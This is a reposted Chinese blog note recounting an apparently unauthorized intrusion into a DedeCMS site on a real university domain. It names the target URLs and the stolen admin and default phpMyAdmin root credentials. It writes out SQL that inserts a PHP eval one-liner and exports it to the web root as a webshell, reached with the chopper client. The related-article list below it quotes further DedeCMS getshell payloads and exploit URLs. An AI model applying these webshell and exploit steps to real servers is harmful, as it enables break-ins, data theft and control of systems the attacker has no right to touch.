渗透测试笔记

最新推荐文章于 2024-10-04 17:37:14 发布
转载 最新推荐文章于 2024-10-04 17:37:14 发布 · 128 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://yq.aliyun.com/articles/134793
文章标签:

#php #数据库 #shell

本文记录了一次针对织梦CMS系统的提权过程,包括利用最新Exp获取后台账号密码、解决后台缺失问题、通过phpmyadmin进行提权并最终获得webshell的详细步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

今天朋友在入侵织梦的网站系统,通过最新的Exp获得了织梦后台的账号和密码
  账号:admin
  密码:abc123456
  但是,找来找去找不到后台,就让我提权试试。
  我看了下:http://pxc.ncist.edu.cn/dede/
  后台被删除了!怎么办??
  google hack也没找到后台
  后来,我试了试这个网站:http://zsjy.ncist.edu.cn/phpmyadmin
  输入默认MySql账号与密码:
  账号:root
  密码:root
  居然进去了:
  接下来就是phpmyadmin提权了:
  我的思路是:
  1.先爆出php服务器www的路径
  2.然后通过将php一句话插入数据库再导出到www路径
  通过google hack爆到路径:D\www\
  呵呵,接下来就执行sql语句:
CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL );
INSERT INTO `mysql`.`xss` (`xss1` ) VALUES ('<?php @eval($_POST[milantgh])?>');
SELECT xss1 FROM `mysql`.`xss` INTO OUTFILE 'd:/www/x.php';
  这段sql意思是:
  1.在mysql数据库中建一张表叫xss,在xss表中生成一个field(字段)叫xss1
  2.将php一句话木马插入数据库中的xss1字段处
  3.将数据库中xss1字段的内容导出到d:\www\x.php文件中
  这下,通过chopper连接x.php小马得到shell
《WEB安全渗透测试》(18)DedecmsV5.7越漏洞+前台重置管理员密码漏洞复现(2)
午夜安全
11-17 3758
《WEB安全渗透测试》(18)DedecmsV5.7越漏洞+前台重置管理员密码漏洞复现(2) 接着上一篇,我们已经获取到一个webshell,这篇文章是后续及漏洞利用。(1)systeminfo生成文件systeminfo >dedecms.txt(2)更新windows-exploit-suggester下载windows-exploit-suggester.py后,先安装xlrd,之后才可以更新。...
《WEB安全渗透测试》(17)Dedecms越漏洞+前台重置管理员密码漏洞复现(1)
午夜安全
11-17 4446
《WEB安全渗透测试》(17)Dedecms越漏洞+前台重置管理员密码漏洞复现(1) 在Windows server2008服务器上安装phpstudy,将dedecms的网站源码复制到C:\phpStudy\PHPTutorial\WWW\下,启动phpstudy,运行模式选择系统服务,安装成功后,可以在浏览器访问服务器ip地址,如下所示:访问如下安装地址,示删除install/install_lock.txt。删除后,可以正常访问,之后按照示安装完成即可。安装完成后,访问首页。...
php网站木马,dedecms过新版安全狗拿shell+
weixin_35915385的博客
03-12 379
http://www.mfztdw.net/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=...
CVE-2018-20129:DedeCMS V5.7 SP2前台文件上传漏洞
weixin_33724570的博客
12-20 772
一、漏洞摘要 漏洞名称: DedeCMS V5.7 SP2前台文件上传漏洞上报日期: 2018-12-11漏洞发现者: 陈灿华产品首页:http://www.dedecms.com/软件链接:http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7-UTF8-SP2.tar.gz版本: DedeCMS V5.7 SP2正式版CV...
一次特别的DedeCMS站点渗透
moon fairy's blog
07-23 4914
 一系列故事的开端: 这是搜到的一个Dede站点的后台 路径为/dede  获得到该站点的用户名以及密码后(这里不具体说明),输入用户名和密码之后就进入了后台,并且下意识的打开了文件管理器 不过管理员也不是等闲之辈,早已卸载该模块 于是,我找到了另一处可以生成PHP文件的地方 在”标签源码管理“这里可以创建PHP脚本文件 去掉默认的代码,写入eval代码,点击保存,文...
dedecms漏洞getshell EXP最新可用
weixin_33674976的博客
06-18 596
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,”<?php eval($_POST[guige]);?>”);{/dede:php}’) # @`\’`EXP:http://www.xxx.org/plus/download...
渗透测试笔记.rar
02-25
这份名为"渗透测试笔记.rar"的压缩包文件包含了两份文档,分别是"渗透测试-实验拓扑环境 2020年1月22日.pdf"和"渗透测试 2020年1月21日.pdf",它们似乎源自《Metasploit渗透测试魔鬼训练营》一书的学习笔记,旨在...
内网集系统渗透测试笔记.zip
11-29
从内容上讲,渗透测试笔记应当包含目标系统的环境描述、所采用的工具和技术、测试过程中的具体操作步骤以及每一步骤的详细结果。最终,笔记供一个清晰的攻击路径视图,明确展示从初始渗透到最终目标达成的整个...
渗透测试笔记copy整理.zip
11-29
渗透测试笔记copy整理Micro8渗透攻击超十年,由于年龄,身体原因,自己感觉快要退出一线渗透攻击了。遂打算把毕生所学用文字表写出来。因为文章涉及到敏感的攻击行为,所以好多需要打马赛克,或者是本地以demo的形式...
渗透测试笔记.docx
最新发布
04-28
渗透测试笔记.docx
No.0 笔记 | 从小白到入门:我的渗透测试笔记
聚焦网络安全,以多元语言优势汲取知识,分享生动有趣的学习与技术心得。
10-04 608
本文整理了渗透测试的核心知识点,包括其定义、分类和目标。详细介绍了渗透测试的七个关键阶段,从前期交互到最终报告。重点到了Nmap和Metasploit等常用工具,并以MS17-010漏洞为例,简述了实战技巧。文章还强调了渗透测试的重要性,以及持续学习和实践的必要性。最后,供了一些学习建议,如关注安全网站、做笔记和多动手操作,帮助读者更好地掌握这一重要的网络安全技能。
dedecms漏洞组合拳拿站(渗透笔记
热门推荐
一个安全研究员
07-13 1万+
如题
CMS5.7最新有效防挂马清马,漏洞修补全!2019-8-30更新
猿计划
08-30 3803
本文为大家详细介绍处理挂马的有效方法!作者分享最新清理木马与防止挂马,网站安全;
DedecmsV5.7任意代码执行漏洞复现(靶场及工具已打包)
爱国小白帽
12-29 2605
声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理,著作归爱国小白帽所有 准备 靶场及工具打包在公众号,回复“dede”领取,也可单独下载 dedecmsV5.7靶机源码 冰蝎3.0window版 可公网访问的云端服务器(如果没有可用本地虚拟机模拟) phpstudy D盾(次要) FinalShell(次要) 首先将靶机解压,进入install目录,将install_lock.txt文件删除,inde.
实验一 线性表的基本操作实现
weixin_40132866的博客
09-17 1318
1、实验中用到的数据类型的定义:抽象数据类型         在程序中,定义了一个类模板 template,在该类中有 DataType data[MaxSize] 和length两个私有成员,分别表示该类中存放数据元素的数组和线性表的长度;定义了构造函数SeqList()和析构函数~SeqList(),还有对列表进行求线性表的长度、输出、查找、插入以及删除等操作的函数。 2、相关操作
渗透测试之信息收集
weixin_45380284的博客
03-05 5776
信息收集 对一个站点进行渗透测试之前,常见方法是直接通漏洞扫描器来对指定目标站点进行渗透,当指定的目标站点无漏洞情况,渗透测试员就需要进行信息收集工作来完成后期的渗透。 1.域名信息收集(域名和子域名探测) 1. DNS域传送漏洞 dnsenum的目的是尽可能收集一个域的信息,它能够通过谷歌或者字典文件猜测可能存在的域名,以及对一个网段进行反向查询。它可以查询网站的主机地址信息、域名服务器、mx record(函件交换记录),在域名服务器上执行axfr请求,通过谷歌脚本得到扩展域名信息(google hac
Python基础笔记_Day09_Python模块、自定义模块、包、时间模块
dushine2008的博客
12-19 482
Day09_Python模块、自定义模块、包、时间模块 09.01_Python语言基础(模块概述)(掌握) 09.02_Python语言基础(导入模块--import)(掌握) 09.03_Python语言基础(模块重命名import...as)(掌握) 09.04_Python语言基础(定位模块--搜索路径)(了解) 09.05_Python语言基础(标准函数库中的模块)(熟练) 09.06_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值